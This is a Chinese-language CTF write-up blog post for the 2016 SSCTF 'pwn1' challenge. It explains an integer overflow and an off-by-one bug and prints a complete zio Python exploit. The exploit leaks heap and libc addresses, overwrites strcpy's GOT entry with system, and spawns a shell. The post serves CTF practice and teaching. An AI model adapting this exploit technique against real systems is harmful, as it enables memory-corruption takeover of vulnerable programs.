<!doctype html>



  


<html class="theme-next pisces use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Pwnable,integer-overflow,off-by-one,return-to-libc,x86,练习," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="Environment
LocalLibc  : libc6_2.19-0ubuntu6.6_amd64

ConclusionBugs
integer overflow
off by one bug

很有意思的题目，只发现了off-by-one bug
可以利用这个bug泄露堆的地址，并伪造结构的size
没有找到reload里的整数溢出，后来是参考了google上找到的writeup[1]，">
<meta property="og:type" content="article">
<meta property="og:title" content="ssctf-qual-2016-pwn1">
<meta property="og:url" content="http://0byjwzsf.me/2016/09/02/ssctf-qual-2016-pwn1/index.html">
<meta property="og:site_name" content="Icemakr's Blog">
<meta property="og:description" content="Environment
LocalLibc  : libc6_2.19-0ubuntu6.6_amd64

ConclusionBugs
integer overflow
off by one bug

很有意思的题目，只发现了off-by-one bug
可以利用这个bug泄露堆的地址，并伪造结构的size
没有找到reload里的整数溢出，后来是参考了google上找到的writeup[1]，">
<meta property="og:image" content="http://0byjwzsf.me/images/ssctf-qual-2016-pwn1/2.jpg">
<meta property="og:image" content="http://0byjwzsf.me/images/ssctf-qual-2016-pwn1/3.jpg">
<meta property="og:image" content="http://0byjwzsf.me/images/ssctf-qual-2016-pwn1/1.jpg">
<meta property="og:updated_time" content="2016-09-02T12:37:08.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ssctf-qual-2016-pwn1">
<meta name="twitter:description" content="Environment
LocalLibc  : libc6_2.19-0ubuntu6.6_amd64

ConclusionBugs
integer overflow
off by one bug

很有意思的题目，只发现了off-by-one bug
可以利用这个bug泄露堆的地址，并伪造结构的size
没有找到reload里的整数溢出，后来是参考了google上找到的writeup[1]，">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>




  <link rel="canonical" href="http://0byjwzsf.me/2016/09/02/ssctf-qual-2016-pwn1/"/>

  <title> ssctf-qual-2016-pwn1 | Icemakr's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "//hm.baidu.com/hm.js?5ae83853fc19f40e51b4490ceb76aa1d";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Icemakr's Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">focus your minds</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="st-search-show-outputs">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <form class="site-search-form">
  <input type="text" id="st-search-input" class="st-search-input st-default-search-input" />
</form>

<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
    (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
    e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install', 'Rp7ZqqNxwbocZekuUGSB','2.0.0');
</script>



    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                ssctf-qual-2016-pwn1
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-09-02T00:00:00+08:00" content="2016-09-02">
              2016-09-02
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/CTFs/" itemprop="url" rel="index">
                    <span itemprop="name">CTFs</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/09/02/ssctf-qual-2016-pwn1/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/09/02/ssctf-qual-2016-pwn1/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="Environment">Environment</h1><blockquote>
<p>Local<br>Libc  : libc6_2.19-0ubuntu6.6_amd64</p>
</blockquote>
<h1 id="Conclusion">Conclusion</h1><h2 id="Bugs">Bugs</h2><ul>
<li>integer overflow</li>
<li>off by one bug</li>
</ul>
<p>很有意思的题目，只发现了<em>off-by-one bug</em><br><img src="/images/ssctf-qual-2016-pwn1/2.jpg" alt=""><br><img src="/images/ssctf-qual-2016-pwn1/3.jpg" alt=""></p>
<p>可以利用这个bug泄露堆的地址，并伪造结构的size</p>
<p>没有找到reload里的整数溢出，后来是参考了google上找到的writeup<a href="http://uaf.io/exploitation/2016/02/28/SSCTF-PWN-400.html" target="_blank" rel="external">[1]</a>，利用这个漏洞可以绕过如下所示的分配内存时的大小检查</p>
<p><img src="/images/ssctf-qual-2016-pwn1/1.jpg" alt=""></p>
<p>从而分配到一块size为<em>0x4000000</em>的结构，然后利用update函数实现任意地址读写，可以覆盖<code>got@strcpy</code></p>
<p>不过这里遇到了一个疑惑，<code>memcpy</code>和<code>strcpy</code>的实际加载地址和libc中查找到的偏移不符，后来找到了这篇文章<a href="https://infosecguerrilla.wordpress.com/2016/07/28/glibc-strange-behavior/" target="_blank" rel="external">[2]</a>，关于gcc实现的<strong><em>indirect function</em></strong></p>
<p>另外，很喜欢用<a href="https://github.com/zTrix/zio" target="_blank" rel="external">zio</a>，不过最近题目练多了，感觉打字有点麻烦，稍微修改了下几个函数的名字（重新定义了几个函数，实现其实就是调用原来的函数)，记录一下</p>
<figure class="highlight gradle"><table><tr><td class="code"><pre><span class="line">origin      <span class="keyword">new</span></span><br><span class="line">--------    ----------------</span><br><span class="line"></span><br><span class="line">r           <span class="keyword">read</span></span><br><span class="line">rl          readline</span><br><span class="line">rls         <span class="keyword">readlines</span></span><br><span class="line">rtl         read_until</span><br><span class="line"></span><br><span class="line">w           <span class="keyword">write</span></span><br><span class="line">wl          <span class="keyword">writeline</span></span><br><span class="line">wls         writelines</span><br><span class="line"></span><br><span class="line">w_af        write_after</span><br><span class="line">wl_af       writeline_after</span><br><span class="line">wls_af      writelines_after</span><br><span class="line"></span><br><span class="line">gdb_hint    hint</span><br><span class="line">interact    itr</span><br></pre></td></tr></table></figure>
<h1 id="Exploit">Exploit</h1><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> zio <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"></span><br><span class="line">target  = <span class="string">'./pwn1-fb39ccfa'</span></span><br><span class="line">io      = zio(target, print_read = <span class="keyword">False</span>, print_write = <span class="keyword">False</span>, timeout = <span class="number">1000</span>)</span><br><span class="line"></span><br><span class="line">io.hint([<span class="number">0x804959f</span>])</span><br><span class="line"></span><br><span class="line"><span class="comment"># 0x40000000 &lt;&lt; 2 + 1 = 0x4 (integer overflow !</span></span><br><span class="line">io.wls_af(<span class="string">'_CMD_$'</span>, [<span class="string">'sort'</span>, <span class="string">'1'</span>, str(<span class="number">0x40000000</span>)])</span><br><span class="line"></span><br><span class="line"><span class="comment"># sort</span></span><br><span class="line">io.wl_af(<span class="string">'Choose:'</span>, <span class="string">'3'</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># off-by-one leak</span></span><br><span class="line">io.wls_af(<span class="string">'Choose:'</span>, [<span class="string">'1'</span>, <span class="string">'1'</span>])</span><br><span class="line">io.rtl(<span class="string">'[*L*] Query result: '</span>)</span><br><span class="line">heap_base = int(io.rl()[<span class="number">0</span>:-<span class="number">1</span>]) - <span class="number">0x38</span></span><br><span class="line"><span class="keyword">print</span> <span class="string">'[+] heap base : '</span> + hex(heap_base)</span><br><span class="line"></span><br><span class="line"><span class="comment"># off-by-one write</span></span><br><span class="line">io.wls_af(<span class="string">'Choose:'</span>, [<span class="string">'2'</span>, <span class="string">'1'</span>, str(heap_base + <span class="number">0x3c</span>)])</span><br><span class="line">io.wl_af(<span class="string">'Choose:'</span>, <span class="string">'7'</span>)</span><br><span class="line"></span><br><span class="line">io.wls_af(<span class="string">'_CMD_$'</span>, [<span class="string">'reload'</span>, <span class="string">'0'</span>])</span><br><span class="line"></span><br><span class="line">got_strcpy  = <span class="number">0x0804d03c</span></span><br><span class="line">idx  = str((got_strcpy + <span class="number">0x100000000</span> - (heap_base + <span class="number">0x4c</span>)) / <span class="number">4</span>)</span><br><span class="line">io.wls_af(<span class="string">'Choose:'</span>, [<span class="string">'1'</span>, idx])</span><br><span class="line">io.rtl(<span class="string">'[*L*] Query result: '</span>)</span><br><span class="line"></span><br><span class="line">off_strcpy  = <span class="number">0x00139ad0</span>                        <span class="comment">#</span></span><br><span class="line">adr_strcpy  = ctypes.c_uint32(int(io.rl()[<span class="number">0</span>:-<span class="number">1</span>])).value</span><br><span class="line"><span class="keyword">print</span> <span class="string">'[+] strcpy\t: '</span> + hex(adr_strcpy)</span><br><span class="line">libc_base   = adr_strcpy - off_strcpy</span><br><span class="line"><span class="keyword">print</span> <span class="string">'[+] libc base\t: '</span> + hex(libc_base)</span><br><span class="line">off_system  = <span class="number">0x00040190</span>                        <span class="comment"># 0x0003bc90</span></span><br><span class="line">adr_system  = libc_base + off_system</span><br><span class="line"><span class="keyword">print</span> <span class="string">'[+] system\t: '</span> + hex(adr_system)</span><br><span class="line"></span><br><span class="line">val  = str(ctypes.c_int32(adr_system).value)</span><br><span class="line">io.wls_af(<span class="string">'Choose:'</span>, [<span class="string">'2'</span>, idx, val])</span><br><span class="line">io.wl(<span class="string">'7'</span>)</span><br><span class="line"></span><br><span class="line">io.wl_af(<span class="string">'_CMD_$'</span>, <span class="string">'sh'</span>)</span><br><span class="line"></span><br><span class="line">io.itr()</span><br></pre></td></tr></table></figure>
<h1 id="Reference">Reference</h1><ol>
<li><a href="http://uaf.io/exploitation/2016/02/28/SSCTF-PWN-400.html" target="_blank" rel="external">http://uaf.io/exploitation/2016/02/28/SSCTF-PWN-400.html</a></li>
<li><a href="https://infosecguerrilla.wordpress.com/2016/07/28/glibc-strange-behavior/" target="_blank" rel="external">https://infosecguerrilla.wordpress.com/2016/07/28/glibc-strange-behavior/</a></li>
</ol>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Pwnable/" rel="tag">#Pwnable</a>
          
            <a href="/tags/integer-overflow/" rel="tag">#integer-overflow</a>
          
            <a href="/tags/off-by-one/" rel="tag">#off-by-one</a>
          
            <a href="/tags/return-to-libc/" rel="tag">#return-to-libc</a>
          
            <a href="/tags/x86/" rel="tag">#x86</a>
          
            <a href="/tags/练习/" rel="tag">#练习</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/08/24/0ctf-qual-2015-freenote/" rel="next" title="0ctf-qual-2015-freenote">
                <i class="fa fa-chevron-left"></i> 0ctf-qual-2015-freenote
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2016/09/03/linux-inside/" rel="prev" title="Linux Insides 笔记1 (Booting)">
                Linux Insides 笔记1 (Booting) <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/09/02/ssctf-qual-2016-pwn1/"
           data-title="ssctf-qual-2016-pwn1" data-url="http://0byjwzsf.me/2016/09/02/ssctf-qual-2016-pwn1/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/author.jpg"
               alt="Icemakr" />
          <p class="site-author-name" itemprop="name">Icemakr</p>
          <p class="site-description motion-element" itemprop="description">感觉至上的梦想家</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">26</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">31</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/Seas0n" target="_blank" title="github">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  github
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Environment"><span class="nav-number">1.</span> <span class="nav-text">Environment</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Conclusion"><span class="nav-number">2.</span> <span class="nav-text">Conclusion</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Bugs"><span class="nav-number">2.1.</span> <span class="nav-text">Bugs</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Exploit"><span class="nav-number">3.</span> <span class="nav-text">Exploit</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Reference"><span class="nav-number">4.</span> <span class="nav-text">Reference</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Icemakr</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.0.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"0byjwzsf"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    <script src="/vendors/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  






  
  

  

  

  

</body>
</html>
